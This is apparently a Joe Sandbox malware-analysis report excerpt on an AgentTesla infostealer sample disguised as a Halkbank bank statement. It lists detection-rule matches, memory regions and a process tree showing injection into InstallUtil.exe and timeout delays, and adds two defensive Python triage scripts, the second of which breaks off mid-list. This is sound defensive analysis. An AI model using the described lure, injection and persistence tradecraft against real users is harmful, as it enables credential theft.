Source: 18.0.Ffnbziuo.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Ffnbziuo.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 18.2.Ffnbziuo.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_017A4908 0_2_017A4908
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06330598 0_2_06330598
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06458D68 0_2_06458D68
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06455270 0_2_06455270
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06455A18 0_2_06455A18
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06456868 0_2_06456868
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06452020 0_2_06452020
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645B9C0 0_2_0645B9C0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645B7F0 0_2_0645B7F0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645B797 0_2_0645B797
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_064595C9 0_2_064595C9
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06452350 0_2_06452350
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06456B02 0_2_06456B02
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06453108 0_2_06453108
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06330CB8 0_2_06330CB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0169F080 15_2_0169F080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0169F3C8 15_2_0169F3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633C740 15_2_0633C740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633EC50 15_2_0633EC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06338310 15_2_06338310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06337110 15_2_06337110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331662 15_2_06331662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633166A 15_2_0633166A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633165E 15_2_0633165E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B2 15_2_063316B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B6 15_2_063316B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BA 15_2_063316BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BE 15_2_063316BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316A6 15_2_063316A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AA 15_2_063316AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AE 15_2_063316AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169A 15_2_0633169A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169E 15_2_0633169E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F2 15_2_063316F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F6 15_2_063316F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FA 15_2_063316FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FE 15_2_063316FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E2 15_2_063316E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E6 15_2_063316E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EA 15_2_063316EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EE 15_2_063316EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D2 15_2_063316D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D6 15_2_063316D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DA 15_2_063316DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DE 15_2_063316DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C2 15_2_063316C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C6 15_2_063316C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316CA 15_2_063316CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316CE 15_2_063316CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331732 15_2_06331732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331736 15_2_06331736
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633173A 15_2_0633173A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331722 15_2_06331722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331726 15_2_06331726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633172A 15_2_0633172A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633172E 15_2_0633172E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331712 15_2_06331712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331716 15_2_06331716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633171A 15_2_0633171A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633171E 15_2_0633171E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331702 15_2_06331702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331706 15_2_06331706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633170A 15_2_0633170A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633170E 15_2_0633170E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331742 15_2_06331742
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331746 15_2_06331746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06338260 15_2_06338260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06333330 15_2_06333330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06330040 15_2_06330040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063399A8 15_2_063399A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A59230 15_2_06A59230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5661E 15_2_06A5661E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A54218 15_2_06A54218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5CC70 15_2_06A5CC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A535B0 15_2_06A535B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A58DF8 15_2_06A58DF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A509D8 15_2_06A509D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A59AD0 15_2_06A59AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5420A 15_2_06A5420A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A52A78 15_2_06A52A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A50888 15_2_06A50888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A591DA 15_2_06A591DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5AD37 15_2_06A5AD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5B160 15_2_06A5B160
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_008248F8 17_2_008248F8
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_00824908 17_2_00824908
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05588D68 17_2_05588D68
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05583108 17_2_05583108
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_0558B9C0 17_2_0558B9C0
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05586868 17_2_05586868
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05582020 17_2_05582020
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05585270 17_2_05585270
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05585A18 17_2_05585A18
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05582350 17_2_05582350
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05586B02 17_2_05586B02
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_055B4300 17_2_055B4300
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05460CB8 17_2_05460CB8
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_01204908 18_2_01204908
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF8D68 18_2_05DF8D68
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF6868 18_2_05DF6868
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF2020 18_2_05DF2020
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF5270 18_2_05DF5270
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF5A18 18_2_05DF5A18
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF3108 18_2_05DF3108
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF2350 18_2_05DF2350
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF6B0B 18_2_05DF6B0B
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05E240B0 18_2_05E240B0
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05CD0CB8 18_2_05CD0CB8
Source: Halkbank_Ekstre_20220513_082357_541079.exe Binary or memory string: OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.400268491.00000000050E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameXbdqzwgvzotiiytiobf.dll" vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382251635.00000000086BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: get_OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXbdqzwgvzotiiytiobf.dll" vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000000.261249129.0000000000E02000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIdksgm.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.402627186.0000000007F81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: get_OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.411249230.0000000009043000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe Binary or memory string: OriginalFilenameIdksgm.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
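The "OriginalFilename vs ..." lines above come from comparing the VERSIONINFO resource of every PE found in process memory with the name of the running image; a value that does not match (here Idksgm.exe, Xbdqzwgvzotiiytiobf.dll, WukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe and protobuf-net.dll against Halkbank_Ekstre_20220513_082357_541079.exe) points at an embedded, dropped or injected PE that was built under another name. The script below is an added example of that check and is not part of the Joe Sandbox report or the sample; the buffer it scans is constructed here from the names the report lists, not dumped from the analysed process, and the struct builder exists only to produce that test data.

```python
"""Carve OriginalFilename values out of a memory dump and compare them with
the running image's name.  Added example, not part of the sandbox report.
SAMPLE_DUMP is constructed test data, not memory from the analysed sample."""
import ntpath
import struct

KEY = "OriginalFilename\0".encode("utf-16-le")
MAX_VALUE_CHARS = 260


def carve_original_filenames(blob):
    """Return every OriginalFilename string found in blob.

    A VS_VERSIONINFO 'String' entry is wLength, wValueLength, wType (three
    WORDs), the UTF-16 key, padding to a DWORD boundary, then the UTF-16
    value.  For the key 'OriginalFilename' header + key is 40 bytes, so the
    value normally follows the key directly; one zero word of padding is
    tolerated for entries that are not DWORD-aligned in the dump.
    """
    found = []
    pos = blob.find(KEY)
    while pos != -1:
        start = pos + len(KEY)
        if blob[start:start + 2] == b"\x00\x00":   # alignment padding
            start += 2
        units = []
        for off in range(start, min(len(blob) - 1, start + MAX_VALUE_CHARS * 2), 2):
            unit = blob[off:off + 2]
            if unit == b"\x00\x00":                # UTF-16 terminator
                break
            units.append(unit)
        if units:
            try:
                found.append(b"".join(units).decode("utf-16-le"))
            except UnicodeDecodeError:
                pass                               # junk that happened to contain the key
        pos = blob.find(KEY, start)
    return found


def mismatched_names(process_image, blob):
    """OriginalFilename values that differ from the process image's own name:
    each is a PE the process carries that was not built under that name
    (a payload, a dropped copy, or a bundled library)."""
    own = ntpath.basename(process_image).lower()
    return [n for n in carve_original_filenames(blob) if n.lower() != own]


def make_string_entry(key, value):
    """Build one VS_VERSIONINFO 'String' struct (constructed test data only)."""
    k = (key + "\0").encode("utf-16-le")
    v = (value + "\0").encode("utf-16-le")
    body = k + b"\0" * (-(6 + len(k)) % 4) + v        # pad key to DWORD boundary
    length = 6 + len(body)
    return struct.pack("<HHH", length, len(v) // 2, 1) + body + b"\0" * (-length % 4)


# Constructed buffer: junk, an unrelated entry, then the names the report lists.
SAMPLE_DUMP = (
    b"\xcc" * 13
    + make_string_entry("CompanyName", "Example")
    + make_string_entry("OriginalFilename", "Idksgm.exe")
    + b"\x90" * 7
    + make_string_entry("OriginalFilename", "WukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe")
    + make_string_entry("OriginalFilename", "protobuf-net.dll")
)

if __name__ == "__main__":
    image = r"C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe"
    for name in mismatched_names(image, SAMPLE_DUMP):
        print(f"OriginalFilename {name} vs {ntpath.basename(image)}")
```

On a real dump, replace SAMPLE_DUMP with the bytes of the process memory region (for example a .sdmp file such as the ones named in the lines above). Libraries like protobuf-net.dll will show up as legitimate mismatches; the names that matter are executables whose OriginalFilename matches nothing on disk.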
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ffnbziuo.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Halkbank_Ekstre_20220513_082357_541079.exe Virustotal: Detection: 34%
Source: Halkbank_Ekstre_20220513_082357_541079.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
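The process tree above carries three behaviours worth detecting on an endpoint: the sample launches C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe with no arguments (InstallUtil normally needs an assembly path; a bare instance that stays alive is being used as a host for the injected payload reported earlier), both the sample and its dropped copy run "cmd.exe /c timeout 20" as a cheap delay, and the dropped Ffnbziuo.exe under AppData\Roaming starts with no visible parent. The script below is an added example of process-lineage triage written for this report; it is not part of the Joe Sandbox output. Its event list is constructed from the "Process created" lines above with made-up PIDs, the pid/ppid/image/cmdline layout is an assumed schema rather than a real log format, and the final InstallUtil event is a constructed benign control.

```python
"""Process-tree triage over Sysmon-style process-creation records.
Added example for this report, not part of the Joe Sandbox output.
EVENTS is constructed from the report's 'Process created' lines; PIDs and
the (pid, ppid, image, cmdline) layout are assumptions, not a real schema."""
import ntpath
import re
import shlex
from dataclasses import dataclass, field


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    children: list = field(default_factory=list)


EVENTS = [
    # (pid, ppid, image, command line) -- constructed from the report
    (1, 0, r"C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe",
     r'"C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe"'),
    (2, 1, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c timeout 20'),
    (3, 2, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (4, 2, r"C:\Windows\SysWOW64\timeout.exe", "timeout 20"),
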